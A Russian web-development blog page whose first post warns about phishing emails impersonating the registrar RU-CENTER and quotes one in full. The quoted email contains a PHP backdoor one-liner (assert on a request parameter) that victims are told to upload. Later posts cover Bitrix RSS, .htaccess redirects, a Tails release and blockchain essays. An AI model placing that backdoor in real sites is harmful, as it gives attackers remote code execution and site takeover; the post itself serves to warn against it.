КОНЬЯКОВ.ру

Аудит, Разработка, ИБ, Поддержка и SEO сайтов

Курсы валют на сегодня

Мошеннические рассылки от лица RU-CENTER (nic.ru)

Мошеннические рассылки от лица RU-CENTER (nic.ru)

В последнее время участились мошеннические рассылки (spam/scam) якобы от лица RU-CENTER (nic.ru) только письма приходят от домена @nic.technical, @nic.tech и т.п.

Письмо выглядит очень правдоподобно, в нём фигурирует логотип Ru-Center и следующий дословный текст:


Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом example.com осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл 8741w0562wo02526.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 26 февраля 2018 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Вот скриншот этого безобразия:

Будьте внимательны! Никогда не при каких условиях не ведитесь на подобные “разводы”. Никогда, не при каких условиях не размещайте файлы, скрипты и подобные вещи у себя на сайте. С помощью этих уловок мошенники с лёгкостью смогут взломать ваш сайт, и использовать его в своих корысных целях. В худшем случае смогут “угнать” ваш домен, т.е. перерегистрировать его на себя. Тем самым украв ваш бизнес. Начнут вас шантажировать и требовать деньги за выкуп домена обратно.

Предупреждён значит вооружён.


PS: Пруф-линк уведомления от RU-CENTER об осуществлении мошеннических рассылок: https://www.nic.ru/news/2017/alert_27.03.html

Рассылки от мошенников

Уважаемые клиенты!

Некоторые наши клиенты периодически получают письма якобы от имени RU-CENTER, призывающие:

разместить в корневой директории сайта вредоносный файл для подтверждения права владения доменом;
произвести оплату услуг по ссылке, ведущей на сайт, не имеющий отношения к RU-CENTER;
оплатить «регистрацию домена в поисковых системах», «присутствие в интернете» и т.д.

Подобные письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом, не запрашиваем у клиентов пароли в электронных письмах, не размещаем формы оплаты наших услуг на сторонних ресурсах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов, публикуемые на нашем сайте.

Чтобы не стать жертвой мошенничества:

проверяйте достоверность информации на сайте https://nic.ru, если вы получили письмо, призывающее произвести проверку домена, оплату или любое другое действие, связанное с изменением правил;
если в письме содержится ссылка на сайт RU-CENTER, после перехода убедитесь, что вы находитесь на сайте по адресу https://www.nic.ru, в адресной строке присутствует зелёный замок и для сайта установлен сертификат, выданный JSC ‘RU-CENTER’;
внимательно проверяйте адрес отправителя. Наши письма уходят только с адресов в домене nic.ru. Поддельные адреса мошенников часто заканчиваются на @nic.technical, @nic.tech и т.п.

В случае малейших подозрений — уточняйте информацию в службе поддержки.

Будьте бдительны!

Ошибочное отображение старых новостей в RSS фиде Новостей Битрикс (проблема кросспостинга через RSS ленту)

Для того чтобы распространять новости по различным социальным сетям нужно использовать отдельные сервисы кросспостинга либо своё решение реализующее данную возможность. Как правило все эти сервисы используют RSS ленту, чтобы публиковать новости. Система кросспостинга периодически (по расписанию) запрашивает RSS ленту сайта, разбирает её на составляющие части и принимает решение. Публиковать новость (если она еще не опубликована) или не публиковать её (следовательно уже опубликована).

В Битрикс, чтобы в новостях была подключена возможность генерации RSS, необходимо в настройках разрешить RSS.

[здесь и далее вам нужно заменить https://www.example.com/ на URL своего сайта]

На странице: https://www.example.com/bitrix/admin/iblock_type_admin.php?PAGEN_1=1&SIZEN_1=10&lang=ru

[где “news” это ID типа инфоблока]

https://www.example.ru/bitrix/admin/iblock_type_edit.php?lang=ru&ID=news

После этих манипуляций в свойствах нужного инфоблока:

Появляется возможность редактировать параметры RSS:

Чтобы включить отображение ссылки на RSS-фид (иконка RSS) нужно (в режиме редактирования битрикс) в включаемом компоненте bitrix:news нажать на шестерёнку

Далее в вкладке “Настройки RSS” выставить нужные настройки RSS:

Также необходимо определить порядок сортировки новостей (вкладка “Источник данных”). Как правило Первичная сортировка происходит “по дате начала активности” (по убыванию), и вторичная сортировка “по ID” (по убыванию):

Просмотр RSS фида. Обратите внимание, что вверху самые свежие новости…

А внизу RSS… старые записи. Почему так может проиходить? Мы же правильно выставили настройки RSS. Правильно выставили направления сортировок, и так далее. Но с завидным упорством вылезают старые записи.

Начал копать, и выяснил что:

Старые новости имели пустоту в поле начала активности (поле не было заполнено). Такие события нежелательны в принципе.

После заполнения этого поля, сохранения, обновления кеша вывода компонента RSS ленты будет выводиться…

Корректный вывод RSS ленты:

Следующим шагом будет
проверка настройки “Поля элементов инфоблока” на странице
https://www.example.com/bitrix/admin/iblock_edit.php?type=news&lang=ru&ID=1&admin=Y&return_url=iblock_section_admin.php%3FIBLOCK_ID%3D44%26type%3Dcatalog%26lang%3Dru%26find_section_section%3D0

Где желательно поставить в поле “Начало активности” значение “Текущие дата и время”, а также поставить галочку “Обязательное поле”.

Благодарю за внимание.

301-redirect (перенаправление) с HTTP на HTTPS в .htaccess

Чтобы проделать ту или иную процедуру, необходимо создать (или модифицировать) файл .htaccess который лежит в корневой директории сайта (просмотреть можно посредством программы FTP-клиента).

Если мы НЕ ХОТИМ использовать WWW в адресе сайта

Перенаправить с или без www: домен 2 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/example\.com\/$1" [R=301,L]

Перенаправить с или без www: домен 3 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/example\.com\/$1" [R=301,L]

Если мы ХОТИМ использовать WWW в адресе сайта

Перенаправить с или без www: домен 2 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^forum\.example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.forum\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/www\.forum\.example\.com\/$1" [R=301,L]

Перенаправить с или без www: домен 3 уровня

RewriteEngine on
RewriteCond %{HTTP_HOST} ^forum\.example\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.forum\.example\.com$
RewriteRule ^(.*)$ "https\:\/\/www\.forum\.example\.com\/$1" [R=301,L]

Двуязычная форма в Битриксе

Сегодня мы рассмотрим вопрос создания формы на двух (и более) языках в Битриксе.

Имеем форму:

Где все описания к вопросам на двух языках разделенные слешем (/):

Все действия проводятся в шаболне формы. Чтобы создать новый шаблон, нужно в режиме редактирования:

Нужно скопировать шаблон формы по умолчанию (.default) с новым именем, например visit-form

и выбрать месторасположение (по умолчанию в общем шаблоне .default).

Сохраняем. Затем нажимаем на шестеренку формы, выбираем Заполнение веб-формы -> Редактировать шаблон компонентов:

Мы увидим шаблон формы, а точнее адрес этого шаблона в файловой системе хостинга.

После этого, я настоятельно рекомендую вам найти этот файл в FTP-клиенте, сделать его резервную копию. После этого можете открыть рабочий файл в своём любимом текстовом редакторе, и уже работать с ним.

Далее опишу алгоритм решения вопроса:

Мы определяем элемент(ы) которы(й|е) нужно распарсить на два языка и вывести на той или иной стороне сайта. В моём случае мы определяем массив, где элементов больше 200 (список стран и регионов) – строка 25. Потом пробегаемся по массиву этого отдельного вопроса “Страны” (строка 32) и распарсиваем его на 2 языка – строка 37.

Строки 40-44 описывают условие при котором на той или иной стороне сайта выводится тот или иной язык описания вопроса (в нашем случае название страны-региона то на английском то на русском языке).

Подобный алгоритм используем в отношении самих “Вопросов” – строки 62-70.

В целом код прокомментирован и там всё понятно.

Tails 3.5 is out

Several security holes that affect Tails 3.4 are now fixed in Tails 3.5.

We strongly encourage you to upgrade to Tails 3.5 as soon as possible.

Tor Browser: MSFA 2018-03
amd64-microcode: CVE-2017-5715
thunderbird: Debian Security Advisory 4075, Debian Security Advisory 4061
libxml2: Debian Security Advisory 4086
gdk-pixbuf: Debian Security Advisory 4088
bind9: Debian Security Advisory 4089

Download latest release: https://tails.boum.org/install/download/index.en.html

Захватывающий и необъяснимый тысячепроцентный бум… Спустя несколько недель – пятидесятипроцентный крах.

Биткоин падал в конце 2013 года и начале 2014 года. В начале 2018 года мы видим аналогичное падение.

С тех пор утекло много воды, но в отличии от “вчерашнего” дня современные трейдеры научились извлекать выгоду в периоды спада. Но что нужно усвоить крепко, так это то, что криптовалюта до сих пор является очень рискованным вложением.

С 2013 года рынок криптовалют так и остался рынком спекулянтов, стремящихся стать сказочно богатыми, а не инвесторов, анализирующих бизнес-модели или денежные потоки. Страх упустить возможность приводит к буму и спешке как можно быстрее вывести средства в Fiat в период спада. Реальное применение Биткоина к сожалению все еще в остаётся мечтах криптоактивистов.

Bitcoin (BTC) - Live Bitcoin price and market cap

Ethereum (ETH) - Live Ether price and market cap

Пользовательская база Telegram может стать убийственным приложением блокчейна TON

Telegram запустит блокчейн-систему и криптовалюту в марте 2018 года.

В декабре 2017 года появился интересный слух: cогласно «осведомленным источникам», мессенджер Telegram, являющийся очень популярным среди фанатов криптовалют благодаря мощной шифровке и защите приватности, запустит собственную блокчейн-платформу и криптовалюту.

8 января 2018 года издание TechCrunch сообщило о том, что несколько источников, пожелавших остаться инкогнито, подтвердили этот слух и предоставили информацию из секретного информационного документа Telegram. В TechCrunch утверждают, что «потенциал для развития криптовалюты в рамках популярного приложения для обмена сообщениями огромен».

Конечно, доступным стала и аналитическая записка по white paper, слитому в СМИ. Обладателем документа стал портал Cryptovest, а его подлинность была независимо подтверждена сервисом TNW. В 23-страничной аналитической записке часто упоминается пока не изданный white paper, в котором, согласно изданию TechCrunch, 132 страницы.

«В документе описано виденье новой криптовалюты и экосистемы, которая может отвечать требованиям сотен миллионов пользователей, включая 200-миллионную базу Telegram», — говорится в white paper. «Запуск планируется на 2018 год. Криптовалюта будет основана на мульти-блокчейн системе с доказательством доли владения — TON (платформа Telegram Open Network, названная на основании 2021 The Open Network) — разработанной для нового поколения криптовалют и децентрализованных приложений».
Масштабирование и внедрение
Согласно представителям Telegram, криптовалюты и другие технологии на основе блокчейна имеют потенциал по превращению планеты в более безопасную и самоуправляемую среду, но пока ни одна валюта, созданная на основании консенсуса, не прижилась на массовом рынке и не достигла повсеместного принятия. Несмотря на практическую ценность биткоина и Ethereum, «на данный момент не существует стандартной криптовалюты, используемой для регулярного обмена ценностями в повседневной жизни широких слоев населения». Именно на изменение этой ситуации и нацелен проект TON. Представители Telegram уверены, что миру нужен «децентрализованный эквивалент привычной валюты — истинная криптовалюта для массового рынка».

Читайте также – Павел Дуров прокомментировал слухи о новой криптовалюте на базе мессенджера Telegram

Важным требованием для криптовалюты для массового потребителя также является масштабирование пропускной способности транзакций на секунду, которое уже доступно в большинстве сетей кредитных карт, таких как Visa и Mastercard. Пока разработчики биткоина и Ethereum ломают голову над увеличением пропускной способности, согласно информационному документу Telegram на данный момент этот показатель составляет 7 транзакций в секунду для биткоина и 15 для Ethereum, что приводит к недостаточной скорости и более высокой стоимости транзакций. Однако, кажется, в этом информационном документе не берутся во внимание протоколы второго уровня.

Более того, согласно Telegram, существующие криптовалюты также сталкиваются и с другими трудностями. Например, они до сих пор являются слишком сложными для обычных торговцев и потребителей, а спрос на цифровые активы исходит, в основном, от инвесторов, а не простых потребителей. Также экосистеме не хватает критической массы для роста и «фактического внедрения в жизни сотен миллионов пользователей».

«Telegram использует опыт в распределенном хранении зашифрованных данных для создания TON, быстрой и масштабируемой мульти-блокчейн платформы», — утверждается в white paper. «TON можно считать децентрализированным суперкомпьютером и системой передачи стоимости. Соединяя в себе минимальное время транзакций и максимальную защищенность, TON может стать альтернативой для сервисов VISA/Mastercard в новой децентрализованной экономике».
Технические параметры
Блокчейн TON будет состоять из главной цепи и (со временем) из огромного количества (2**92) сопровождающих блокчейнов (сегментов), которые могут разделяться и соединяться в динамичном режиме для управления изменениями в нагрузке и достижения оптимальной пропускной способности. В платформе TON будет использоваться подход доказательства доли владения, основанный на варианте протокола Byzantine Fault Tolerant («задача византийских генералов») и мгновенной маршрутизации в гиперкуб для разделения рабочей нагрузки между сегментами. Сетевые протоколы для хранения данных, приватность пользования на подобие программного обеспечения TOR и микроплатежи будут выпущены после блокчейн-ядра TON.

Само собой, платформа TON будет полностью интегрирована в сеть передачи сообщений Telegram. Согласно white paper, это позволит Telegram управлять обширной пользовательской базой и разработать экосистему, которая откроет криптовалюты для миллионов людей, «легкие кошельки» которых будут встроены в приложение Telegram. Также в документе утверждается, что 84% всех блокчейн-проектов имеют активные каналы в Telegram, что больше, чем у всех других сервисов по обмену сообщениями вместе взятых. Это значит, что Telegram — «наиболее популярное приложение-мессенджер в сфере криптовалют в мире».

Согласно дорожной карте, представленной в white paper, тестовая сеть с минимальной функциональностью платформы TON будет запущена во втором квартале 2018. Затем, после прохождения этапа испытаний и аудита безопасности в четвертом квартале 2018 года будет запущена стабильная версия TON и Telegram-кошелек.

Финансирование в Gram
Валюта платформы TON будет называться Gram. Для финансирования платформы TON в первом квартале текущего года Telegram запустит продажу токенов. Предполагается, что 44% от общего количества (2,2 млрд) Gram будет продаваться по стартовой цене в 0,10 долларов США за один Gram с поэтапным увеличением. Цена каждого Gram будет на одну миллиардную выше, чем предыдущего, а после продажи всех 2,2 млрд токенов стоимость одного Gram достигнет 1 доллара США. На основании этих предположений вполне возможно, что продажа токенов Telegram имеет все шансы стать самой масштабной в истории.

52% из общего числа Gram будет оставлено в TON Reserve для «защиты новой криптовалюты от спекулянтов и поддержания гибкости на ранних этапах эволюции системы», и еще 4% будет оставлено для команды разработчиков.

Согласно планам на текущий момент, в продаже токенов будет использоваться Simple Agreement for Future Tokens, SAFT («Простое соглашение для будущих токенов») с конвертацией исходных TON Gram в соотношении 1:1 после запуска блокчейна TON.

Telegram хочет стать стартовой площадкой для TON, но со временем планируется перенос собственности и управления системой TON в некоммерческий Фонд TON. «До 2021 года будет создано и воплощено начальное виденье и архитектура TON», — указано в white paper. «Затем из аббревиатуры TON будет удален элемент «Telegram», а само название будет изменено на «The Open Network». После этого постоянное совершенствование блокчейна TON ляжет на плечи функционеров Фонда TON».

«Убийственное приложение» платформы TON: пользовательская база, ориентированная на приватность
«Убийственное приложение» платформы TON – это возможность Telegram удовлетворить требования миллионов поклонников криптовалют из 200-миллионной пользовательской базы мессенджера. Однако в то же время следует отметить, что большая часть населения не беспокоится ни о шифровании, ни о криптовалютах. К примеру, такие приложения для обмена сообщениями, как Messenger от Facebook и Whatsapp, гораздо более популярны, чем Telegram.

Telegram — это независимый сервис на самостоятельном финансировании с упором на безопасность данных. Популярность Telegram среди приверженцев криптовалют можно объяснить тем, что приложение финансировали «либертарианцы для сохранения свободы путем шифрования данных». Эти свойства повышают его привлекательность по сравнению с другими платформами, такими как Messenger или Whatsapp, для пользователей, которым важна защита приватности.

В этом ключе интересно поразмышлять о возможном запуске собственной криптовалюты и соцсетью Facebook с интеграцией в систему и мессенджер.

В одном из последних постов Марк Цукерберг, сооснователь и генеральный директор Facebook, поделился мыслью, что вопреки общепринятому мнению о том, что технология может стать движущей силой децентрализации, расширив возможности людей, сейчас кажется, что совокупный эффект технологий состоит в концентрации возможностей в руках крупных корпораций и правительств.

«Возникла значимая обратная тенденция, представленная, к примеру, шифрованием и криптовалютой, которые забирают влияние у централизованных систем и передают его обратно людям», — утверждает Цукерберг. «Но тут же появляется новый риск — эти явления сложнее контролировать. Мне нравится более подробно разбираться в этом и изучать позитивные и негативные аспекты этих технологий, а также оптимальные методы их применения в рамках наших услуг».
В своем выступлении на Международной конференции по кибербезопасности 9 января 2018 года директор Федерального бюро расследований США Кристофер Рэй поделился собственными опасениями в отношении шифрования, рассказав, что в прошлом году правоохранительные органы не смогли получить доступ к 7 800 устройствам.

«Эта проблема негативно влияет на ход расследований за границей по таким вопросам, как торговля людьми, борьба с терроризмом, контрразведка, борьба с бандами и организованной преступностью в целом, детский труд и кибербезопасность», — заявил он.
Он призвал представителей частного сектора найти способ «предоставления ответа на законные судебные приказы с поддержанием как верховенства права, так и кибербезопасности». Возможно, Цукерберг размышляет именно о таких проблемах доступа.

Маловероятно, чтобы Facebook превратился в такого же надежного флагмана безопасности, как Telegram, но однозначно будет занятно наблюдать за нововведениями Facebook в сфере криптовалют.

Прошло 10 лет, а никто не придумал, как использовать блокчейн

Прошло 10 лет, а никто не придумал, как использовать блокчейн

Все говорят, что блокчейн — технология, лежащая в основе криптовалют — изменит ВСЁ. Но спустя годы усилий и многомиллиардные инвестиции никто так и не придумал, как можно использовать блокчейн, если не считать криптовалютных спекуляций и противозаконных финансовых транзакций.

Во всех описываемых случаях использования — от платежей до юридических документов, от депонирования до систем голосования — авторы прибегали к всевозможным ухищрениям, чтобы внедрить распределённый, зашифрованный, анонимный реестр, в котором не было нужды. А что если вообще не существует потребности в использовании распределённого реестра? Что если отсутствие масштабных проектов на базе распределённого реестра спустя десятилетие разработок объясняется тем, что это никому не нужно?

Платежи и банковское дело

Изначально блокчейн разрабатывался для использования в криптовалютах вроде биткоина — как способ хранения и обмена ценностей, почти как любые остальные валюты. Visa и MasterCard были объявлены динозаврами, потому что теперь появился бесплатный и мгновенный способ обмена ценностями без берущих мзду посредников. Революция в банковском деле была лишь началом… правительства, больше неспособные проводить эмиссию денег, уйдут на задний план, потому что граждане смогут свободно переводить деньги вне национальных систем.

Киллер-фича: знание, что можно вернуть свои деньги.

Не прошло много времени, как мечта развалилась. С одной стороны, уже есть бесплатный и мгновенный способ обмена ценностями без посредников — наличные. Биткоины заменяют доллары, но Visa и MasterCard сидят на долларовых банковских транзакциях, предоставляя набор услуг добавленной стоимости, вроде отслеживания мошеннических споров и идентификации покупателей и продавцов. Судя по всему, для человека, платящего за товар, главной особенностью новой платёжной системы — как с PayPal в его ранние годы — является уверенность в том, что если товар окажется неудовлетворительным, то можно вернуть себе деньги. А для человека, получающего оплату, главной особенностью платёжной системы является уверенность в том, что покупатели действительно платят и хотят пользоваться этой системой. Добавьте сюда баллы, кредитные линии и бесплатную регистрацию багажа на всех рейсах авиакомпании United Airlines — и вы получите систему, которую выбирают пользователи и которой пользуются торговцы. На самом деле никто не хочет платить биткоинами, поэтому они не пока не взлетели.

Чтобы Visa работала на блокчейне, понадобится энергия 5 000 атомных реакторов.

К тому же это не настолько хорошая платёжная система. Visa может обрабатывать 60 000 транзакций в секунду, а биткоин исторически топчется на 7. Есть технические модификации, позволяющие повысить эффективность биткоина, но в качестве отправной точки у вас есть нечто, что тянет лишь примерно на 0,01% клиринговых транзакций. И нужно упомянуть, что для этих семи транзакций в секунду биткоин уже тратит примерно в 35 раз больше энергии, чем Visa. Если довести частоту биткоин-транзакций до 60 000 в секунду, то понадобится столько энергии, сколько вырабатывается во всём мире.

Возможность переводить средства без надзора правительства

Во многих странах возможность что-то делать без пригляда властей делает мир лучше. На Кубе или в Венесуэле многие предпочитают переводить деньги в долларах, и биткоин, теоретически, может выполнять ту же функцию. Но есть как минимум две причины, почему эта криптовалюта не стала желанной панацеей: превосходство правительства перед отдельным гражданином и превосходство правительства перед обществом.

Mt Gox теряет деньги пользователей.

Поддерживаемая правительством банковская система предоставляет страхование вкладов, обеспечивает обратимость переводов, проверку личности, стандарты аудита и систему расследования на случай возникновения проблем. У биткоина по определению ничего из этого нет. Как-то я наткнулся на примечательную ветку на форуме, в которой пишут люди, чьи биткоин-кошельки опустошили, взломав почту и похитив пароли. Они были ошеломлены, потому что им неоткуда ждать помощи! И это широко распространено: в 2014-м компания Mt. Gox, бывшая тогда крупнейшим биткоин-трейдером, из-за дыр в системе безопасности потеряла $400 млн. своих пользователей. Следующий крупнейший биткоин-трейдер, Bitfinex, тоже закрылся после потери пользовательских денег. Представьте себе мир, в котором банки скорее теряли бы деньги вкладчиков, чем приумножали бы их. Биткоин — это средневековое банковское дело: «вот твой либертарианский рай, хорошего тебе дня».

BitFinex теряет все деньги пользователей.

Эта проблема очень близка и понятна мне, потому что моя собственная компания True Link создавалась для помощи уязвимым пожилым людям — которые готовы выдать номера своих кредиток по телефону, принять участие в мутных тотализаторах или пожертвовать сомнительным организациям, вложиться в мошеннические компании или установить программу для кроссвордов, крадущую пароли. Эти люди больше всего нуждаются в развитых средствах защиты в банковской сфере и платёжных системах, они сильно зависят от современных степеней защиты и станут первыми жертвами предлагаемых изменений ради внедрения мгновенных, идентифицируемых по приватному ключу и необратимых переводов. Тот, кто смотрит на банковскую безопасность с точки зрения человека, придумал бы что-нибудь очень отличающееся от блокчейна!

С введением санкций против России в монгольских банках более чем в 4 раза вырос объём переводов.

Кроме того, вырабатываемые правительствами решения нацелены на противодействие финансированию терроризма и организованной преступности, на борьбу с обращением запрещённых товаров вроде похищенных номеров кредиток или детской порнографии. Поэтому главное пожелание, чтобы транзакции были приватными, но при этом их можно было открыть по распоряжению силовых структур. Спросите людей: «должно ли правительство иметь возможность по приказу получить список всех, кому вы платили» — и большинство ответит «нет». Спросите: «должно ли правительство иметь возможность по приказу получить список всех, кому платил коллекционер детской порнографии» — и большинство ответит «да». Никто не хочет, чтобы биткоин в 100 раз увеличил объём обращения товаров, которые считаются запрещёнными. Как мне сказал один биткоин-энтузиаст, «если бы ты сегодня изобрёл наличные, их тоже запретили бы».

Микроплатежи и межбанковские переводы

Теперь поговорим о двух ситуациях, в которых блокчейн-валютам прочат особенно светлое будущее: микроплатежи и межбанковские переводы. Что касается платежей, то энтузиасты напирают на бесплатность и мгновенность биткоин-транзакций. Хотя на самом деле транзакция занимает около 8 минут, а её обработка стоит около 4 центов. Нам предлагают использовать биткоины для микроплатежей — например, заплатить два цента музыканту за прослушивание его песни в сети, или четыре цента за чтение газетной статьи. Но предназначенная для этого инфраструктура — к примеру, предварительная авторизация источника средств, чтобы не приходилось ждать 8 минут для прочтения статьи, на которую вы только что кликнул — на самом деле вообще не требует использовать биткоины. Если вас устраивает цена в четыре цента за статью или два цента за песню, то платите раз в месяц с банковского счёта. На практике люди предпочитают микроплатежам подписки.

Прошло три года, а Ripple для SWIFT — как зубочистки для американского валового продукта.

Что касается межбанковских платежей, то многие вспоминают про Ripple как многообещающий способ передачи денег между банками. На момент написания статьи за последние 30 дней было обработано 2 млрд долларов межбанковских и межличностных транзакций — примерно 40-секундный объём межбанковской сети SWIFT — спустя три года банковской торговли 90 % высокообъёмных валют. Это как вклад продаж зубочисток в американский ВВП. Почему банки не предпочли эту новую технологию? Дело в том, что настройка Ripple-шлюза не слишком отличается от использования существующей системы корреспондентских счетов — за исключением того, что потеря пароля или токена может привести к гораздо более крупным и быстрым потерям. А биткоин-обмен, напомню, скорее способствует этому, а не предотвращает. Одни и те же свойства банковской системы привлекают и пользователей, и банки. Там уже есть реестры, которые не нужно распределять, анонимизировать, шифровать, публиковать и делать необратимыми.

«Умные» контракты

«Умные» контракты — это контракты в виде ПО, а не юридические документы. Хранение непосредственно в блокчейне позволяет им производить передачу ценности, основанную непосредственно на криптографическом согласии сторон. Иными словами, «умные» контракты являются «самоисполняемыми». В теории, контракты, написанные в виде ПО, интерпретировать дешевле: поскольку они действуют в буквальном смысле математически и автоматически, не существует двух способов интерпретации, а значит не нужны и дорогие юридические сражения.

DAO теряет все деньги пользователей.

И в реальном мире уже есть примеры проблемности этого подхода. Самый многообещающий и большой на сегодняшний день контракт, инвестиционная структура под названием Distributed Autonomous Organization (DAO), позволил своим участникам вкладывать деньги напрямую, используя приватные криптографические ключи для выбора объектов инвестирования. Ни юристов, ни комиссионных, ни закулисных заседаний. DAO «исключил возможность ошибочного инвестирования и потери средств директорами и финансовыми управляющими». И вот из-за программного бага DAO «проголосовал» «инвестировать» $50 млн, треть денег вкладчиков, в структуру, управляемую очень умными программистами, которые собаку съели на проблемах рекурсии при обновлениях баланса. Кто-то считает, что это был взлом или эксплойт, потому что ПО работало не так, как задумывалось. Другие считают, что никакого взлома не было — суть ПО как раз и заключалась в автономности принятия решений, это нельзя трактовать двояко, и если не понимаешь, как работает это ПО, то нечего было и участвовать. В результате все участники проголосовали задним числом возместить программный контракт и вернуть деньги их настоящим владельцам. Какой вывод? Даже самые умные блокчейн-энтузиасты на самом деле хотят, чтобы куча людей спорили о настоящих целях контракта, а не позволяли ПО самоисполняться. Быть может, «глупый» способ в результате оказывается умным?

Даже криптоэнтузиасты спорят о значении своих контрактов

DAO был показательным экспериментом, а что насчёт рутинных транзакций в больших компаниях? Инвесторы и стартапы в сфере смарт-контрактов обещают, что блокчейн обеспечит сверхбыстрое исполнение и платежи, например, в здравоохранении — «вместо того, чтобы 3-6 месяцев ждать обработки заявок, или тратить часы на телефонные разговоры в попытке заставить оплатить ваш счёт, умный контракт теоретически может быть обработан мгновенно». Но это справедливо для любых программных систем покупок. Серверы Amazon, используемые моей компанией, автоматически масштабируются в зависимости от трафика на сайт, и мы платим только за реальное использование. Ошибочно предполагать, что смарт-контракты это изменят. Они подразумевают юридическое соглашение, вступающее в действие вместе с ПО, причём само юридическое соглашение тоже представлено в виде ПО. Условия обслуживания Amazon не являются смарт-контрактом, но реализующая эти термины биллинговая система автоматизирована. А причина отсутствия автоматизации, скажем, в биллинге медицинского страхования заключается не в том, что существующее ПО недостаточно «умное» для обработки поступающих заявок и их электронной оплаты, а в том, что страховые компании сами по себе медлительны, либо исторически, либо потому что они предпочитают проверку заявок людьми.

Пожалуйста, пусть биткоин это ускорит?

В конце концов все, от блокчейн-энтузиастов до страховщиков, хотят нормально обсуждать суть деловых отношений и интерпретировать их на постоянной основе, а уже потом писать ПО, занимающееся обработкой и выплатами. Уже существующее — это status quo.

Распределённое хранение, вычисления и обмен сообщениями

Ещё одна невероятная идея использования блокчейна — механизмы распределённого хранения. На первый взгляд, вполне здраво: разбиваете свои документы на «блоки», шифруете их и помещаете в распределённый журнал… он раскидан по множеству машин, это безопасно и легко можно отследить все действия.

Но существует куча замечательных способов разбиения файлов, шифрования и репликации по множеству хранилищ в разных местах. Уже есть компания, зарекомендовавшая себя как более дешёвую альтернативу — распределённый Dropbox, шифрующий и хранящий файлы на множестве пользовательских винчестеров и платящий им небольшую комиссию за используемое место. Блокчейн — это особенно неэффективный и небезопасный способ распределённого хранения.

Ха! Может ваш блокчейн сделать ЭТО?

У блокчейн-подхода есть 4 дополнительных недостатка.

Во-первых, вы полагаетесь на единую точку шифрования — ваш приватный ключ, — а не на более сложную систему, которая может использовать двухфакторную аутентификацию, определение вторжений, ограничения объёмов, файрволы, удалённое отслеживание IP и возможность отключать систему в экстренных случаях.

Во-вторых, ценовые компромиссы совершенно неправдоподобны: блокчейн Биткоина уже сожрал электричества почти на миллиард долларов, которое ушло на хэширование данных, составляющих примерно 1/6 от объёма Dropbox-подписки в 10 долларов/мес.

В-третьих, систематический выбор, куда и насколько реплицировать данные, выгоден в долгосрочной перспективе. А у блокчейна распределение данных по умолчанию не такое уж и умное.

И наконец, Dropbox, Box.com, Google, Microsoft, Apple, Amazon и множество других компаний предоставляют набор других полезных возможностей, которые вы вряд ли захотите разрабатывать самостоятельно. По аналогии с Visa, проблема не в хранении данных, а в управлении разрешениями, отмене совместного доступа к данным, которые вы расшарили ранее, в получении наглядной истории документов, в синхронизации между многочисленными устройствами и многом другом.

Те же самые аргументы справедливы и для распределённых вычислений, и для приложений безопасного обмена сообщениями. Шифрование, вечное хранение и распределение по всей сети — это огромная избыточная работа по сравнению с основной задачей. Существуют превосходные решения для вычисления, обмена сообщениями и хранения данных, оснащённые всеми необходимыми средствами шифрования и репликации, причём лучше, чем у решений на основе блокчейна, — и кучей дополнительных замечательных возможностей впридачу.

Было громко объявлено о том, что NASDAQ запустила для частных акций внутреннюю биржу на основе блокчейна. Но постойте. Поправьте меня, если не прав, но вся суть NASDAQ (или, например, депозитарной трастовой и клиринговой компании) заключается в том, что она имеет реестр, кто и какими акциями владеет? Неужели они беспокоились, что их системы без блокчейна скоро не смогут отслеживать балансы?

Как и в других задачах, связанных с отслеживанием транзакций, вроде платежей «покупатель-продавец», разница между реестрои NASDAQ и блокчейном заключается в том, что блокчейн распределён — это решает проблему отсутствия доверенного посредника. И сегодня для легальных транзакций сама компания, её агент передачи записи, клиринговая палата или биржа — все они доверенные посредники, обычно предлагающие услуги добавленной стоимости. Причина, по которой NASDAQ — правильное место рождения биржи на базе блокчейна, заключается в том, там сидят эксперты в соблюдении законодательных требований и обеспечении безопасности при торговле акциями. Уберите из цепочки посредника (в данном случае саму NASDAQ) и правительство, и у вас останутся исключительно компании, которые решаются на хитроумные манёвры с юридическими системами, системами соблюдения законодательных требований и отслеживающими системами, традиционными для основного рынка. Как вам скажут люди, торгующие акциями, не допущенными на биржу, это гарантия потери ваших денег.

Для чего готовится бумажная документация при выпуске ценных бумаг

И мы это уже видели. Новые компании начали создавать «монеты» на основе блокчейна, конвертируемые в акции самих компаний, и публично продавать их в ходе Initial Coin Offerings (ICO) в качестве дешёвого и более гибкого способа подъёма денег по сравнению с традиционным первичным публичным размещением (IPO) акций на бирже. Интересно посмотреть, как долго продлится это безумие — помимо прочего, предложение токенов, превращаемых в акции, считается предложением ценных бумаг, так что правила SEC должны распространяться на токены, как и на другие ценные бумаги. К тому же «монеты» — это лишь менее защищённые электронные сертификаты акций, защищённые лишь вашей заботой о пароле, а не законами и защитой биржи ценных бумаг — либо это ещё одна попытка обойти закон.

Проверка подлинности

